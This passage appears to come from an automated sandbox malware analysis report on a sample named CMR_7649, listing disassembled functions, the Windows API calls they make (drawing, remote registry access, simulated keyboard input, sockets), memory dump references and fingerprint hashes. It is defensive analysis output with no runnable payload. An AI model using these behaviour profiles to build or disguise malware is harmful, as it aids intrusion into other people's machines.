                                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                • CloseFigure.GDI32(?), ref: 0044751F
                                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                • String ID:
                                                • API String ID: 4082120231-0
                                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                • String ID:
                                                • API String ID: 2027346449-0
                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • GetMenu.USER32 ref: 0047A703
                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                • _wcslen.LIBCMT ref: 0047A79E
                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                • String ID:
                                                • API String ID: 3257027151-0
                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLastselect
                                                • String ID:
                                                • API String ID: 215497628-0
                                                • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 0044443B
                                                • GetKeyboardState.USER32(?), ref: 00444450
                                                • SetKeyboardState.USER32(?), ref: 004444A4
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 00444633
                                                • GetKeyboardState.USER32(?), ref: 00444648
                                                • SetKeyboardState.USER32(?), ref: 0044469C
                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                • String ID:
                                                • API String ID: 2354583917-0
                                                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                • String ID:
                                                • API String ID: 896007046-0
                                                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                • GetFocus.USER32 ref: 00448ACF
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                • String ID:
                                                • API String ID: 3429747543-0
                                                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                • __swprintf.LIBCMT ref: 0045D4E9
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu$\VH
                                                • API String ID: 3164766367-2432546070
                                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Msctls_Progress32
                                                • API String ID: 3850602802-3636473452
                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                • String ID:
                                                • API String ID: 3985565216-0
                                                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _malloc.LIBCMT ref: 0041F707
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • _free.LIBCMT ref: 0041F71A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
